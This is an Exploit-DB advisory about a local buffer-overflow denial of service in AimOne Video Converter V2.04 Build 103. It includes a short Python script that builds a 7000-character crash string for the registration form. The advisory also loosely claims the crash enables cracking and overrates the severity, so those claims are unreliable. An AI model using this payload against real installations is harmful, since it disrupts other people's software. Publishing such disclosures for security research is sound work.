[dos] AimOne Video Converter V2.04 Build 103 - Buffer Overflow (DoS)
2023-4-1 08:0:0 Author: www.exploit-db.com(查看原文) 阅读量:5 收藏

## Title: AimOne Video Converter V2.04 Build 103 - Buffer Overflow (DoS)
## Author: nu11secur1ty
## Date: 01.05.2023
## Vendor: https://aimone-video-converter.software.informer.com/,
http://www.aimonesoft.com/
## Software: https://aimone-video-converter.software.informer.com/download/?ca85d0
## Reference:

## Description:
The AimOne Video Converter V2.04 Build 103 suffers from buffer
overflow and local Denial of Service.
The registration form is not working properly and crashes the video converter.
When the attacker decides to register the product. This can allow him
to easily crack the software and do more bad things it depending on
the case.

## STATUS: HIGH Vulnerability - CRITICAL

[+] Exploit:

```Python
#!/usr/bin/python
# nu11secur1ty

print("WELCOME to the AIMONE Video Converter 2.04 Build 103 - Buffer
Overflow exploit builder...\n")
input("Press any key to build the exploit...\n")
buffer = "\x41" * 7000

try:
	f=open("PoC.txt","w")
	print("[+] Creating %s bytes exploit payload.." %len(buffer))
	f.write(buffer)
	f.close()
	print("[+] The PoC file was created!")
except:
	print("File cannot be created")
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/AimOne/AimOne-Video-Converter-V2.04-Build-103)

## Proof and Exploit:
[href](https://streamable.com/v1hvbf)

## Time spent
`00:35:00`

## Writing an exploit
`00:15:00`


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>
            

文章来源: https://www.exploit-db.com/exploits/51196
如有侵权请联系:admin#unsafe.sh